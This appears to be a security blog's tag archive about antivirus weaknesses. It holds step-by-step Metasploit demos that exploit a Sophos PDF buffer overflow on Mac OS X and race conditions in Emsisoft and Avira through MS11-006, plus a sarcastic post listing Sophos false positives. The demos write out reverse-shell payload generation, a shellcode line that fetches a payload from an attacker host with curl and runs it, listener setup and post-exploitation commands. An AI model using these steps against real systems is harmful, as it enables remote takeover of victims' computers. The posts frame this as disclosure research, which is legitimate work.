Tag Archives: Anti-Virus

Sophos Anti-Virus Sophail PDF Vulnerability Metasploit Payload Demo

Timeline :

Vulnerabilities reported to vendor by Tavis Ormandy the 2012-09-10
Public release of the vulnerabilities by Tavis Ormandy the 2012-11-05
PoC provided by Tavis Ormandy the 2012-10-02

PoC provided by :

Tavis Ormandy

Reference(s) :

Full Disclosure
Sophail: Applied attacks against Sophos Antivirus
Sophos products and Tavis Ormandy
VU#662243

Affected version(s) :

Sophos products for Mac OS X
Sophos products for Windows
Sophos products for Linux

Tested on Mac OS X 10.8.2 with :

Sophos Anti-Virus for Mac Home Edition

Description :

This PoC demonstrate one of the Sophos products vulnerabilities reported by Tavis Ormandy. This PoC exploit a PDF stack buffer overflow vulnerability present in Sophos onaccess scanner.

Demo :

1) Create a Mac OS X Metasploit payload:

msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > mac_os_x_payload

2) Modify Sophail shellcode.asm file with, for example:

.command: db "curl -s http://192.168.178.26/mac_os_x_payload > mac_os_x_payload | chmod u+x mac_os_x_payload && ./mac_os_x_payload", 0

3) Make 4) Upload index.html, exploit.bin and exploit.png on a web server 5) Initiate a Metasploit multihandler

use exploit/multi/handler set PAYLOAD osx/x86/shell_reverse_tcp set LHOST 192.168.178.26 exploit -j

6) On the target surf index.html file

7) Exploit the session :)

session -i 1 id /sbin/ifconfig uname -a 

10 of 10 malwares detected by Mac Sophos Anti-Virus are false positives. Does yours?

On April 24, Sophos Naked Security blog had publish a post regarding malware infections on Mac OS X. Sophos has claim that 20% of Mac computers where carrying one or more instances of Windows malwares. All these malwares where detected though they’re free Sophos Anti-Virus for Mac Home Edition.

Flashback malware was the big story of April for Mac consumers and all anti-virus company have jump on this opportunity to promote they’re products and to distill propaganda around Mac OS X security. I agree with them Mac OS X is a product like other product, and Mac OS X has also to be protected against threats, but the proposed solutions are worse than to do nothing.

 

During my tests of Sophos Anti-Virus for Mac Home Edition 10 of 10 malwares detected by the anti-virus were false positives harassing me with constant alert pop-up during regular operations, Spotlight indexing, Time Machine backup. Here under a sample of 10 infections detected by Sophos Anti-Virus for Mac.

Perl/FtpExp-A

False positives due to binary format of the “affected” files.

/Users/xxxx/Library/Saved Application State/com.twitter.twitter-mac.savedState/window_1.data
/Users/xxxx/Library/Preferences/Macromedia/Flash Player/macromedia.com/support/flashplayer/sys/#s.ytimg.com/settings.sol

Troj/BredoZp-JO

Sophos him self is a trojan, and some iTunes applications and Chrome are backdoored and nobody known about it.

/Library/Preferences/com.sophos.sav.plist
/Users/xxxx/Music/iTunes/iTunes Media/Mobile Applications/iSSH 5.3.1.ipa
/Users/xxxx/Library/Saved Application State/com.google.Chrome.savedState/windows.plist

Troj/BredoZp-JN

iTunes is a very well-known backdoored software and one more time Sophos him self contain a trojan.

/Users/xxxx/Library/Caches/com.apple.iTunes/goog-phish-shavar.db
/Library/Preferences/com.sophos.sav.plist

Troj/Iframe-HY

One more time Sophos is a trojan, and now my Spotlight indexed files are also containing backdoor.

/Library/Preferences/com.sophos.sav.plist,
/Volumes/xxxx/.Spotlight-V100/Store-V2/700BF07C-170F-482E-A2BB-45EF8501935C/0.indexPostings

Mal/IRCBot-O 

VLC is containing an IRC bot, gotcha remote control of all VLC users.

/Applications/VLC.app/Contents/Resources/English.lproj/InfoPlist.strings

Troj/PhpShell-Z

One more time VLC how is containing a PHP trojan …

/Applications/VLC.app/Contents/Resources/English.lproj/InfoPlist.strings

Mal/PHPShell-A 

Everybody know that Sophos Anti-Virus products are developed in PHP.

/Library/Preferences/com.sophos.sav.plist

Troj/PDFJs-B 

Help my logs are containing trojans and Sophos one more time.

/private/var/log/DiagnosticMessages/2012.05.05.asl
/Library/Preferences/com.sophos.sav.plist

Mal/Badsrc-C

My Spotlight indexing has a dead malware…

/.Spotlight-V100/Store-V2/DeadFiles/orphan.ef786332/0000/0000/0151/22087716.txt

Troj/PhoexRef-A

Hu my screenshot of Metasploit are containing trojans (why not, lol) and Google drive is backdoored.

/Users/xxxx/Desktop/screenshots/metasploit-vmware-modules-research.png
/Users/xxxx/Library/Application Support/Google/Drive/sync_config.db
/usr/share/zoneinfo/UTC
/Library/Preferences/com.sophos.sav.plist

In conclusion Sophos is more strong to do marketing and give fear to consumers than to create a good Mac anti-virus that really detect something.

?Metasploit Meterpreter race condition against Emsisoft Anti-Malware?

This video will demonstrate you a race condition against Emsisoft Anti-Malware product. This race condition is due to design errors in Emsisoft Anti-Malware product.

We will exploit the MS11-006 vulnerability (Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow) and use a reverse TCP meterpreter payload.

As you will see, the installed “Emsisoft Anti-Malware” product will detect the attack, but to late. The meterpreter sessions is created and you have access to the system. The demonstrated product is an update-to-date Emsisoft Anti-Malware (Version : 5.1.0.10 – Signatures : 5,466,115).

Metasploit commands :

To create the msf.doc file to exploit MS11-06 vulnerability

use exploit/windows/fileformat/ms11_006_createsizeddibsection
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

To listen for incoming meterpreter sessions

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set InitialAutoRunScript migrate -f
exploit -j

Demonstration video :

Metasploit Meterpreter race condition against Avira anti-virus

This video will demonstrate you a race condition against Avira anti-virus products. This race condition is due to design errors in the Avira anti-virus products themselves.

We will exploit the MS11-006 vulnerability (Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow) and use a reverse TCP meterpreter payload.

As you will see, the installed “Avira AntiVir Personal” anti-virus will detect the attack, but to late. The meterpreter sessions is created and you have access to the system.

The demonstrated product is an update-to-date “Avira AntiVir Personal”. But this race condition appear for others Avira products, such as “Avira AntiVir Premium” and “Avira Premium Security Suite“.

Metasploit commands :

To create the msf.doc file to exploit MS11-06 vulnerability

use exploit/windows/fileformat/ms11_006_createsizeddibsection
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

To listen for incoming meterpreter sessions

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set InitialAutoRunScript migrate -f
exploit -j

Demonstration video :